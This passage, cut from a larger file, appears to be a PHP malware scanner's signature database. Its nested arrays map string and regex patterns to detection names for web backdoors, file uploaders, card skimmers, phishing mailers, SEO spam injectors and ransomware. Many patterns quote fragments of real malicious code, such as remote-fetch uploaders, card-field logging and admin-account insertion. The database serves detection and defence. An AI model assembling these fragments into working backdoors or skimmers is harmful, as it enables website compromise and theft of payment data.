			),
	
			'<?php file_put_contents(' => array(STR_TRIGGER,
				'file_put_contents\([^,]+,[\s]*file_get_contents' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader.379.02', 'file_put_contents\([^,]+,[\s]*file_get_contents\(.http[^;]+\);'),
			),
			
			'txt", $str."\n", FILE_APPEND);' => array(STR_TRIGGER,
				'[\'card_cvv\'] . "," .' => array(STR_CLEARFILE, 'php.malware.cc_stealer.022', NULL),
			),
	
			'$_REQUEST["content"];} }if( $extention == "php"){ if (isset($_REQUEST["overwrite"])){file_put_contents($' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.015', NULL),
			'echo me_file_get_contents($filename)' => array(STR_CLEARFILE, 'php.malware.generic.064', NULL),
			'file_put_contents($seurlfile, base64_encode($savedata));' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.038', NULL),
			'file_put_contents(\'options.php\', base64_decode($_POST[' => array(STR_CLEARFILE, 'php.backdoor.generic.034', NULL),
			'file_put_contents(sys_get_temp_dir() . \'/install.log\', $what."\n", FILE_APPEND);' => array(STR_CLEARFILE, 'php.backdoor.generic.013', NULL),
			'file_put_contents(\'_ptemp\',\'<?php \'.' => array(STR_CLEARFILE, 'php.backdoor.ptemp.001', NULL),
			'$r=$_REQUEST;@file_put_contents($r[' => array(STR_CLEARFILE, 'php.backdoor.uploader_fpc.001', NULL),
			'if (isset($_POST["log"]) && isset($_POST["pwd"]))' => array(STR_CLEAR_LINEMATCH,'php.backdoor.wp_login.001', 'if .isset.._POST..log... && isset.._POST..pwd.... \{file_put_content[^\}]+,FILE_APPEND\);\}'),
			'@extract ($_REQUEST); file_put_contents' => array(STR_CLEAR_LINEMATCH,'php.backdoor.uploader.055', '(echo [^;];[\\s]*)?@extract \\(\\$_REQUEST\\); file_put_contents[^;]+;'),
			'_encode(var_export($_POST[\'billing\'], true)).PHP_EOL, FILE_APPEND);} if (array_key_exists(\'payment\', $_POST)) {file_put' => array(STR_CLEARFILE,'php.malware.magento-cc-stealer.037', NULL),
			'Z-Pong:' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.082', '<\?php[^}]+Z-Pong[^#]++#\w+[^@]++@get_remote_file[^\?]++\?>'),
			'file_put_contents("stat_uniq.dat", "*", FILE_APPEND' => array(STR_CLEARFILE, 'php.spam-seo.fake-wpflash.001', NULL),
			'file_put_contents(\'/tmp/out1\', var_export($_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.057', 'file_put_contents\(..tmp.out\d+.,\s*var_export\(\$_REQUEST,\s*true\),\s*FILE_APPEND\)\;'),
			'explode(PHP_EOL,file_get_contents(__DIR__.\'/s\')' => array(STR_CLEARFILE, 'php.malware.dropper.012', NULL), 
			'lgjqbj&3(6+;6y!$>::&%}"!0|6&3(6+;6x%2$p}' => array(STR_CLEARFILE, 'php.backdoor.pregreplace.018', NULL),
			'if (file_put_contents($path, GetPayload($payload)) != FALSE)' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.013', NULL),
			'file_put_contents($cache_dir . $code,$x);' => array(STR_CLEARFILE, 'php.backdoor.cache_module.005', NULL),
			'{echo \'ok:\'.\'1\';unlink(__FILE__); exit;}' => array(STR_CLEARFILE, 'php.backdoor.wp-uploader.004', NULL),
			'@file_get_contents("http://web.51.la' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.web51.001', 'check_meta\(\);[\r\n]+function check_meta\(\)[^\}]+@[^0]+?0[^@]+?@file_put_[^@]+?@touch\(\$jp,\$jptime\);[^@]+@file_get_contents\(.http:..web.51.la[^\}]+\}'),
			'file_put_contents(\'../index\'. \'.\' . $' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell_gen.084', '\$\w+\s*=\s*[\'"]php[\'"]\s*;\s*file_put_contents\([\'"](?:\.\.)?\/index[\'"]\s*\.\s*[\'"]\s*\.\s*[\'"]\s*\.\s*\$\w+\s*,\s*file_get_contents\([^\)]+\)\s*\)\s*;'),
			'file_put_contents(\'cacheplugin.php\', file_get_contents(\'http://' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell_gen.073', 'echo\s*[\'"]\w+[\'"]\s*;\s*copy\s*\([\'"]http(?:s)?:\/\/[^\)]+\)\s*;\s*file_put_contents\([\'"]\w+\.php[\'"],\s*file_get_contents\([\'"]http(?:s)?:\/\/[^\)]+\)\s*\)\s*;'),
			'@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.050', 'function ([\w]+)[\s]*\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*getcwd\(\);[^}]+\$[\w]+[\s]*=[\s]*@?file_get_contents[^;]+;[^}]+FILE_APPEND\);[\s}]+\1[\s]*\(\);[\s]*add_action\(.\1[^;]+\);'),
			'file_put_contents(\'../../../wp-admin/wp-store-class.php\',$request[\'body\']' => array(STR_CLEARFILE, 'php.malware.dropper.022', NULL),
			'<?php file_put_contents($_POST[\'error\'],$_POST[\'details\']);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.228', '<\?php file_put_contents\(\$_POST\[.error.\],\$_POST\[.details.\]\);[\s]*\?>'),
			'private function createDir($path, $chmod = 0777,' => array(STR_CLEARFILE, 'php.backdoor.webshell.134', NULL),
			'php",file_get_contents("http' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.026', '@?file_put_contents\([^,]+,[\s]*file_get_contents\([^\)]+\)[\s]*\);[\s]*(echo[^;]+;[\s]*unlink\(__FILE__\);)?(die\([^;]+\);)?'),
			'file_put_contents($_POST[\'error\'],$_POST[\'details' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.247', 'if[\s]*\([\s]*isset\(\$_POST\[.error.\][\s]*\)[\s]*\)[\s]*\{[\s]*file_put_contents[^}]+\};'),
			'));@touch("index.php",strtotime("-' => array(STR_CLEAR_LINEMATCH, 'php.malware.infector.001', 'if\(isset\(\$_POST\[[^{]+\{[\s]*@?file_put_contents\([^,]+,[\s]*@?file_get_contents\([^;]+;[\s]*@?touch\(.index.php.,strtotime\(.-[^}]+\}'),
			'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyE' => array(STR_CLEAR_LINEMATCH, 'php.malware.dropper.028', 'file_put_contents\([^,]+,[\s]*base64_decode\(.PD9[^;]+;([\s]*\/\*\'\)\;)?'),
			'file_put_contents("start.sh", base64_decode("Cgp0YXIgLXp4dmY' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.016', NULL),
			'$path_upload_file = $dir . "/" . GenerateFilename();' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.018', NULL),
			'$replace="@require(dirname(__FILE__).\'/wp-stat.php\');\n";' => array(STR_CLEARFILE, 'php.backdoor.injector.128', NULL),
			'@chmod($nowHtacFile,0755);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.component.013', '(\$[\w]+[\s]*=[\s]*\'[^\']+\';[\s]*){5,}if\(\$[\w]+[\s]*&&[\s]*file_exists\(\$[\w]+\)\)[\s]*\{[\s]*if[^#]+#[\w]+#.\)[\s]*&&[^\}]+\}[\s]*else[\s]*\{[\s]*@chmod[^\/]+@file_put_contents\(\$[^\}]+[\s\}]+'),
			'file_put_contents ($pst_vars[\'n\'],$pst_vars[\'cmt\']);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.294', '\$pst_vars[\s]*=[\s]*\$POST;[\s]*if[\s]*\(isset\(\$pst_var[^\{]+\{[\s]*file_put_contents[^\}]+\}'),
			'glob.adminka_ip = adminka_list[int(time.time()) % len(adminka_list)]' => array(STR_CLEARFILE, 'py.hacktool.bruteforce.002', NULL),
			'[\w]+\(\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*if\(isset\(\$_REQUEST\[.[\w]*.\]\)\)[^\(]+file_put_contents\(\$[\w]*,stripslashes[\s]*\(\$[\w]*\)\);[^\}]+echo[\s]*\$[\w]*;[\s]*exit;[\s]*\}[\s]*\}' => array(REX_CLEARFILE, 'php.backdoor.uploader.299', NULL),
			'\$[\w]*[\s]*=[\s]*file_get_contents\(.[\w]*.\);\$[\w]*[\s]*=[\s]*base64_decode\(\$[\w]*\);[\s]*file_put_contents\(.[\w]*.,\$[\w]*\);include\(.[\w]*.\);unlink\(.[\w]*.\);' => array(REX_CLEARFILE, 'php.backdoor.uploader.300', NULL),
			'base64_decode("PD9waHAKZGVmaW5lKCdXUF9VU0VfVEhFTUVTJywgdHJ1ZSk7CgovKiogTG9hZHMgdGhlIFdvcmRQcmVzcyBFbnZpcm9ubWVudCBhbmQgVGVtcGxhdGUgKi8KcmVxdWlyZSggZGlybmFtZSggX19GSUxFX18gKSAuICcvd3AtYmxvZy1oZWFkZXIucGhwJyApOw==");' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.006', NULL),
			'setcookie(\'current_id\',phpversion());' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.312', 'ms_not_installed\(\);[^\{]+function[\s]*ms_not_installed\(\)[\s]*\{[\s]*setcookie\(.[\w]+.,phpversion\(\)\);[\s]*if[\s]*\(isset\(\$_COOKIE\[[^\}]+if[\s]*\(\$[\w]+[\s]*===[\s]*.disable.\)[\s]*\{[\s]*unlink\(\$[\w]+\);[\s]*\}[\s]*elseif\(\$[\w]+[\s]*===[\s]*.active.\)[\s]*\{[\s]*file_put_contents\(\$[\w]+,[\s]*\$[\w]+\);[\s]*\}[\s]*\}'),
			'<title>DeaRMaileR' => array(STR_CLEARFILE, 'php.hacktool.mailer.118', NULL),
			'if (file_put_contents(sprintf(\'%s/wp-loader.php\', $file->getPath()), $loader)) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.323', NULL),
			'@copy($fromfile,$tofile);@chmod($tofile,0444);}if(isset($_REQUEST[\'test' => array(STR_CLEARFILE, 'php.backdoor.chmod.003', NULL),
			'$workerHash = md5_file($_SERVER["DOCUMENT_ROOT"].\'/\'.$task[\'key' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.109.02', NULL),
			'crontab.txt\', \'* * * * * usr/bin/php \'.getcwd().\'/\'.$launcher.\'.php' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.109.03', NULL),
			'exec(\'php \'.getcwd().\'/\'.$fold.\'/\'.$worker.\'.php' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.109.04', NULL),
			'symlink(\'/\'.$home.\'/\'.$user.' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.007', NULL),
			'spufingDomain" => isset($_POST["spufingDomain' => array(STR_CLEARFILE, 'php.backdoor.webshell.208', NULL),
			'/shells/b374k.txt' =>array(STR_CLEARFILE, 'php.backdoor.b374k-shell.015', 'NULL'),
			'= tempnam(sys_get_temp_dir(),mt_rand(' => array(STR_CLEARFILE, 'php.backdoor.generic.096', NULL),
			'strpos($_SERVER[\'REQUEST_URI\'], \'/blog/viagra' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.092', 'if.\(strpos\(\$_SERVER\[\'REQUEST_URI\'],..\/\w+\/viagra[^{]*\{[^}]*\}\s+file_put_contents\(\'\w+.txt\'[^}]*\}'),
		),
	
		'if (file_exists(' => array(STR_TRIGGER,
	
			'0777);' => array(STR_TRIGGER,
	
				'0444);' => array(STR_TRIGGER,
					'@chmod(' => array(STR_TRIGGER,
	
						'.suspected\'))' => array(STR_TRIGGER,
							'rename(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.rename.001', 'if\s*\(file_exists\(.\w+[(?:\-\w+)]+\.\w+\.suspected.\)\)\s*{\s*chmod\(.\w+[(?:\-\w+)]+\.\w+.suspected.,\s*[0-9]{3,}\);\s*rename\(.\w+[(?:\-\w+)]+\.\w+\.suspected.,.\w+[(?:\-\w+)]+\.\w+.\);\s*}\s*@chmod\(.\w+[(?:\-\w+)]+\.\w+.,[0-9]{3,}\);'),
						),
	
						'array(\'f\'=>base64_encode(\'<file>/x/x/x.' => array(STR_CLEARFILE, 'php.backdoor.webshell.091', NULL),
					),
				),
	
				'fwrite($htout, "RewriteEngine On' => array(STR_TRIGGER,
	
					'fclose($' => array(STR_TRIGGER,
						'RewriteRule' => array(STR_CLEARFILE, 'htaccess.spam-seo.suspicious-rewrite.006', NULL),
					),
	
					'.php.suspected")) rename (' => array(STR_CLEARFILE, 'php.malware.dropper.034', NULL),
				),
	
				'mkdir($dir_path, 0777);' => array(STR_TRIGGER,
					'~Directory already exists~' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.242', 'ignore_user_abort\(true\);[\s]*set_time_limit\(0\);[\s]*@ini_set\(.error[^{]+function getURL[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*\$header\[\][^<]+<\?php[\s]*\$archive_path[^\*]+echo getURL\(\$url\);[\s]*\}[\s]*exit[^;]*;[\s}]+'),
				),
	
				'exit(doRemoteCopy($path));' => array(STR_CLEARFILE, 'php.backdoor.php_ajax_file_manager.001', NULL),
				'str_replace("{keyword}", $keyword, $html);' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.027', NULL),
				'<a href="admin.php?op=massaddcommands">' => array(STR_CLEARFILE, 'php.backdoor.webshell.191', NULL),
			),
	
			'triggerEvent(\'onUserLogin\', array(array(\'username' => array(STR_TRIGGER,
				'jimport(\'joomla.user.helper' => array(STR_TRIGGER,
					'WHERE usertype="Super Administrator" LIMIT 1' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.004', NULL),
				),
			),
	
			'$archive = new PclZip("' => array(STR_TRIGGER,
				'if ($archive->extract() == 0) {' => array(STR_TRIGGER,
					'die("Error : ".$archive->errorInfo(true));' => array(STR_CLEARFILE, 'php.hacktool.packer.007', NULL),
				),
			),
	
			'fopen("../../wp-login.php", "r"' => array(STR_TRIGGER,
				'exec(\\\'unzip' => array(STR_CLEARFILE, 'php.spam-seo.rewriter.002.03', NULL),
			),
	
			'{echo "http://".$_SERVER[\'HTTP_HOST\']."/' => array(STR_TRIGGER,
				'file_put_contents\(\$path,(file_get_contents|get_url_con)\("http' => array(REX_CLEARFILE, 'php.backdoor.file_get_contents.014', NULL),
			),
	
			'.php.suspected")) rename("' => array(STR_TRIGGER,
				' = fread($file, filesize("..' => array(STR_CLEARFILE, 'php.backdoor.rename.003', NULL),
			),
	
			'get_writable_dirs(".");' => array(STR_TRIGGER,
				'FileWrite($randPath."/".$fileName, base64_decode($fileData), $fileMode, $filePrefix)' => array(STR_CLEARFILE, 'php.malware.injector.041', NULL),
			),
		
			'* Core Post API' => array(STR_TRIGGER, //legit trigger to ensure it will be checked on legit WP files
				'if (file_exists(dirname(__FILE__) . \'/wp-' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.035', 'if \(file_exists\(dirname\(__FILE__\) \. \'.wp-[\w]+\.php.\)+[\s]*include(_once)?\([^;]+\);'),
			),
	
			'if (file_exists(ABSPATH.\'wp-content' => array(STR_TRIGGER,
				'* WPC Cache' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.040', '\/\*\s*WPC\s*Cache[^\*]+\*\/\s*if\s*\(file_exists\(ABSPATH\..wp-content[^\@]+\@include_once\(ABSPATH\..wp-content[^;]+;\s*if\s*\(file_exists\(ABSPATH..wp-content[^\)]+\)\)\s*@include_once\(ABSPATH\..wp-content[^;]+;\s*\/\*\s*WPC\s*Cache[^\*]+\*\/'),
			),
	
			'<title></title>' => array(STR_TRIGGER,
				'if (!is_uploaded_file($_FILES["upfile"][tmp_name])' => array(STR_CLEARFILE, 'php.backdoor.uploader.338', NULL),
			),
	
			'@require_once ($' => array(STR_TRIGGER,
				'\$[\w]+[\s]*=[\s]*.\/home[^;]+;[\s]*if[\s]*\(file_exists\(\$[\w]+\)\)\{[\s]*\@require_once[\s]*\(\$[\w]+\);[\s]*\}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.require_once-injection.008', '\$[\w]+[\s]*=[\s]*.\/home[^;]+;[\s]*if[\s]*\(file_exists\(\$[\w]+\)\)\{[\s]*\@require_once[\s]*\(\$[\w]+\);[\s]*\}'),
			),
	
			')){@require_once(' => array(STR_TRIGGER,
				'\x2f\x68\x6f\x6d\x65' => array(STR_CLEARFILE, 'php.malware.require_once-injection.009', NULL),
			),
	
			'<?php if (file_exists(dirname(__FILE__) . \'/wp-' => array(STR_TRIGGER,
				'include_once(dirname(__FILE__) . \'/wp-' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.067', 'if \(file_exists\(dirname\(__FILE__\)[\s]*\.[\s]*..wp-[^\)]+[\s\)]+include[^;]+\);'),
			),
	
			'return $output;' => array(STR_TRIGGER,
				'touch(dirname($htaccess_path)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.090', '\$[\w]+[\s]*=[\s]*getenv\(.[\w]+.\);[\s]*\$[\w]+[\s]*=[\s]*getenv\(.[\w]+.\);[\s]*\$[\w]+[\s]*=[\s]*substr\(\$[\w]+,[^\@]+while[\s]*\(\$[\w]+[\s]*<[\s]*strlen\(\$[\w]+\)\);[\s]*return[\s]*\$[\w]+;[\s]*\}'),
			),

			'if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== ".."))' => array(STR_CLEARFILE, 'php.malware.injector.048', NULL),
			'if (file_exists("../.htaccess")) unlink ("../.htaccess");' => array(STR_CLEARFILE, 'php.backdoor.rename.002', NULL),
			'3FT Hna Pour unzipi' => array(STR_CLEARFILE, 'php.backdoor.3FTzip.001', NULL),
			'function mycode($link, $red_template, $ip)' => array(STR_CLEARFILE, 'php.spam-seo.redirect.071', NULL),
			'doorgen2/note' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.054', NULL),
			'(\$\w+)\s*=\s*array\([\'"](\w+)\.php[\'"],\s*[\'"]\2\.txt[\'"],\s*[\'"][\w-]+\.php[\'"]\)\s*;\s*foreach\s*\(\1\s*as\s*(\$\w+)\)\s*{\s*if\s*\(file_exists\(\3\)\)\s*{\s*unlink\(\3\)' => array(REX_CLEARFILE, 'php.hacktool.unlink.001', NULL),
			'echo "FILE UPLOADED TO $destination";' => array(STR_CLEARFILE, 'php.backdoor.uploader.014', NULL),
			'api?token=\'.$token.\'&scam' => array(STR_CLEARFILE, 'php.phishing.script.028', NULL),
			'fail_reason(\'Success!' => array(STR_CLEARFILE, 'php.spam-seo.injector_group.001', NULL),
		),
	
		'file_exists' => array(STR_TRIGGER,
		
			'fopen(".htaccess"' => array(STR_TRIGGER,
				'@unlink' => array(STR_TRIGGER,
					'scandir(sys_get_temp_dir(' => array(STR_CLEARFILE, 'php.spam-seo.rewriter.002', NULL),
				),
			),
		
			'$f = $_SERVER[\'DOCUMENT_ROOT\'] . \'/configuration.php\';' => array(STR_TRIGGER,
				'$aus = file($f);' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.012', NULL),
			),
		
			'function recurDir4($dir4,$chmod4=\'\')' => array(STR_TRIGGER,
				'function delloginfile() {' => array(STR_CLEARFILE, 'php.backdoor.delloginfile.001', NULL),
			),
		
			'if (file_exists($defaultPo) && preg_match(\'/\' . implode(\'|\', $wp_claws' => array(STR_CLEARFILE, 'php.spam-seo.injector.028.01', NULL),
			'if(file_exists($f) && is_readable($f)) require_once($f);' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.032', '\$_?\w=.#\w+.;\s*.f = dirname._*FILE_*. \. ".[\w_-]+.php";\s*if.file_exists..f. && is_readable..f.. require_once..f.;'),
			'require_once( \'wp-core.php' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.wp-core.001', 'if \( file_exists. .wp-core.php. . .\{ require_once. .wp-core.php. \); \}'),
			'\'/wp-cd.php\')' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.wp_cd.003', 'if\s*\(file_exists.dirname.__FILE__. \. .\/wp-cd\.php...\s*include[^\)]+\) \. .\/wp-cd\.php..;'),
			'if (!file_exists(\'redirect.url\') || time() - filemtime(\'redirect.url\') > 60)' => array(STR_CLEARFILE, 'php.spam-seo.redirect.012', NULL),
			'_cntnt=@wp_remote_fopen($uri);' => array(STR_CLEARFILE, 'php.spam-seo.injector.120', NULL),
			'$fptest = fopen("wp-content/jspx.php", "w");' => array(STR_CLEARFILE, 'php.spam-seo.link_injector.001', NULL),
			'@file_exists($n.".bin")' => array(STR_CLEARFILE, 'php.malware.dropper.003', NULL),
			'$str_hm = curl_get_from_webpage_one_time("");' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.024.02', NULL),
			'$Password,base64_decode(urldecode($InRequest)),MCRYPT_DECRYPT,\'amsstatinivector\');' => array(STR_CLEARFILE, 'php.hacktool.spamtool.001', NULL),
			'$finish_result[$a][\'content\'] = str_replace($del, \'\', $finish_result[$a][\'content\']);' => array(STR_CLEARFILE, 'php.spam-seo.injector.159', NULL),
			'($not_loading_clean != null) and ($not_loading_clean != \'rvf\'))' => array(STR_CLEARFILE, 'php.spam-seo.injector.159.02', NULL),
			'fwrite($fnew, $arr_all_domains[$c][$o]);' => array(STR_CLEARFILE, 'php.spam-seo.injector.159.03', NULL),
			'($as=0;$as<$fakedep;$as++)' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.001', NULL),
			'(!file_exists($whm_interface_path))' => array(STR_CLEARFILE, 'php.hacktool.cpanel-admin_creator.001', NULL),
			'if(file_exists($doc))' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.cookie.002', '\$\w+\=\$\_SERVER\[.DOCUMENT_ROOT.]\..\/wp\-load\.php.\;\s*if\(file_exists\(\$\w+\)\)\s*\{\s*require\(\$\w+\)\;\s*wp_set_auth_cookie\(1,1\);\s*\}'),
			'header(\'location:\'.$scam.$i);' => array(STR_CLEARFILE, 'php.phishing.redirect.009', NULL),
			'move_uploaded_file($_FILES["file"]["tmp_name"][$index],"uploads/" . $filename);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.174', '\/\/\s*Multiple\s*file\s*upload\s*foreach\s*\(\s*\$_FILES[^\{]+?\{\s*\$filename[^;]+?;\s*if\s*\(\s*!\s*file_exists[^;]+?move_uploaded_file\(\$_FILES\["file"\]\["tmp_name"\]\[\$index\],"uploads\/"\ \.\ \$filename\);\s*\}\s*\}'),
			'fopen("$dirname/.htaccess", "w");' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.067', NULL),
		),
	
		'&& file_exists( get_template_directory()' => array(STR_TRIGGER,
			
			'include_once( get_template_directory() .' => array(STR_TRIGGER,
				'if[\s]*\([\s]*![\s]*class_exists[\s]*\([\s]*[^\)]+\)[\s]*&&[\s]*file_exists[\s]*\([\s]*get_template_directory\(\)[\s]*\.[^{]+\{[\s]*include_once[\s]*\([\s]*get_template_directory\(\)[\s]*\.[^;]+\);[\s]*\}' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.injector.132.02', 'if[\s]*\([\s]*![\s]*class_exists[\s]*\([\s]*[^\)]+\)[\s]*&&[\s]*file_exists[\s]*\([\s]*get_template_directory\(\)[\s]*\.[^{]+\{[\s]*include_once[\s]*\([\s]*get_template_directory\(\)[\s]*\.[^;]+\);[\s]*\}'),
			),
			
			'array_search( $directory, $this->isSpread ) !== false' => array(STR_CLEARFILE, 'php.backdoor.injector.132', NULL),
		),
	
		'if(@file_exists(' => array(STR_TRIGGER,
			'catch(Throwable' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.057', 'try[\s]*\{[\s]*if\(@file_exists\(.\/[\w]+[^\}]+include_once\(.\/[\w]+\/[^$]+\);\}catch\(Throwable[\s]*\$[\w]*\)\{\}'),
			'@chmod($tofile,0444);}if(isset($_REQUEST[\'test\'])){exit(\'ok\');}sleep(1)' => array(STR_CLEARFILE, 'php.malware.reinfect.001', NULL),
		),
	
		'R_HOST' => array(STR_TRIGGER,
			'RAZOR_BASE_PATH' => array(STR_CLEARFILE, 'php.hacktool.spamtool.007', NULL),
		),
	
		'}elseif($_GET[\'page\'] == \'keystrokes\'){' => array(STR_TRIGGER,
			'}elseif($_GET[\'page\'] == \'get-webcam\'){' => array(STR_CLEARFILE, 'php.hacktool.backend.001', NULL),
		),
	
		'function geturl($url)' => array(STR_TRIGGER,
			'echo $file.\'<font color=\"red\"> insufficient permission!</font><br>\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.081.02', NULL),
		),
	
		'new mysqli($JConfig' => array(STR_TRIGGER,
			'INSERT INTO `".$JConfig->dbprefix."user_usergroup_map' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.007', NULL),
		),
	
		'if(!defined(\'IN_LOKI\')) die("File not found.");' => array(STR_CLEARFILE, 'php.malware.lokibot.001', NULL),
		'// Pheonix | Cannabis' => array(STR_CLEARFILE, 'php.phishing.pheonix.001', NULL),
		'$input_p .= "cp $src $dest 2>1  1>/dev/null; chmod +x $dest 2>1  1>/dev/null ;";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.093', '\$[\w]+[\s]*=[\s]*.exec.;[\s]*@?chdir\(BP[^;]+\);[\s]*\$src[^\}]+PATH\}; export[^\}]+\}[\s]*else if[\s]*\([\s]*is_resource[^\}]+\}[\s]*sleep[^\}]+\}[\s]*if[\s]*\(file_exist[^\{]+\{[\s]*@?unlink[^;]+\);[\s]*\}'),
		'\'eng_text3\' =>\'Run command\',' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.061', NULL),
	),
	
	'rand(' => array(STR_TRIGGER,
		'$mapnum' => array(STR_TRIGGER,
			'$sitemap_file' => array(STR_CLEAR_MULTIMATCH, 'php.malware.component.019', '\$sitemap_file[\s]*=[^;]+;[\s]*\$num[^;]+;[\s]*\$mapnum[^;]+;[\s]*\$[\w]+[\s]*=[\s]*rand\([^;]+\);[\s]*'),
		),
	),

	'php_value auto_prepend_file ' => array(STR_TRIGGER,
		'/.htaccess BKP' => array(STR_CLEAR_LINEMATCH, 'php.malware.auto_prepend_file.001', 'php_value auto_prepend_file (?:[^\/]+?\/){1,10}\.htaccess BKP\s*?\w+["\']*'),
	),

	'if(!empty($_FILES[file][tmp_name])){copy($_FILES[file][tmp_name],$_FILES[file][name]);}' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.122', 'if\(!empty\(\$_FILES\[file\]\[tmp_name\]\)\)\{copy\(\$_FILES\[file\]\[tmp_name\],\$_FILES\[file\]\[name\]\);\}'),
	'$ip_protection_api' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.012', NULL),
	'.$file)&&($file!=".")&&($file!="..")){full_del_dir' => array(STR_CLEARFILE, 'php.hacktool.fulldeldir.001', NULL),
	'$inputCon=date("Y-m-d h:i:sa")."---{$iipp}---".$ref."---Refpage=".$_GET[\'HOST\']' => array(STR_CLEARFILE, 'php.phishing.script.037', NULL),
),

'mail(' => array(STR_TRIGGER,

	'header' => array(STR_TRIGGER,

		'$_POST' => array(STR_TRIGGER,

			'base64_decode( file_get_contents($' => array(STR_TRIGGER,

				'mcrypt_get_iv_size' => array(STR_TRIGGER,
					'deRanSomeware' => array(STR_CLEARFILE, 'php.hacktool.ransomware.006', NULL),
				),

				'hash(\'sha256\', $key, true)' => array(STR_STOP, 'php.hacktool.ransomware.001', NULL), 
			),

			'new PHPMailer;' => array(STR_TRIGGER,
				'if ($_POST[\'action\'] == "send")' => array(STR_CLEARFILE, 'php.hacktool.spamtool.002.02', NULL),
				'var sdata = "{\"SmtpServer' => array(STR_CLEARFILE, 'php.hacktool.spamtool.011', NULL),
			),

			'mail($to,$subj,$msg,$from);' => array(STR_TRIGGER,
				'gethostbyaddr($_SERVER[\'REMOTE_ADDR\']);' => array(STR_TRIGGER,
					'$msg = "Email Address :' => array(STR_CLEARFILE, 'php.phishing.mailer.095', NULL),
				),
			),

			'mail($Destination, $Subject8, "", $header);' => array(STR_TRIGGER,
				'if ($ac=="go"){' => array(STR_CLEARFILE, 'php.hacktool.mailer.055', NULL),
			),

			'message\' => \'Sukses\'' => array(STR_TRIGGER,
				'mail($_POST[\'to\'], $_POST[\'subject\'], base64_decode($_POST[\'letter' => array(STR_CLEARFILE, 'php.hacktool.mailer.107', NULL),
			),

			'elseif(filter_var(' => array(STR_TRIGGER,
				'@json_decode(file_get_contents(' => array(STR_CLEARFILE, 'php.phishing.mailer.092', NULL),
			),

			'$mail = base64_decode($_GET[\'domain\']);' => array(STR_TRIGGER,
				'list ($user, $domain) = explode ("@", $mail);' => array(STR_CLEARFILE, 'php.phishing.mailer.105', NULL),
			),
			
			'@mail($para, $assunto, $msg, $headers);' => array(STR_TRIGGER,
				'\n CVV: $' => array(STR_CLEARFILE, 'php.malware.cc_stealer.013', NULL),
			),

			'),NULL,iconv_mime_encode(_' => array(STR_TRIGGER,
				'):chunk_split(base64_encode($' => array(STR_CLEARFILE, 'php.hacktool.mailer.161', NULL),
			),

			'<title>hecker\\\'s spamer v' => array(STR_CLEARFILE, 'php.hacktool.mailer.056', NULL),
			'$email_message .= "CCExpiresYear: ".clean_string($CCExpiresYear)."\n";' => array(STR_CLEARFILE, 'php.phishing.cc_mailer.002', NULL),
			'<title> SPYUS Mailer' => array(STR_CLEARFILE, 'php.mailer.POST.037', NULL),
			'print "-=ok=-";' => array(STR_CLEARFILE, 'php.mailer.POST.038', NULL),
			'fopen("letter.txt","w+")' => array(STR_CLEARFILE, 'php.mailer.POST.039', NULL),
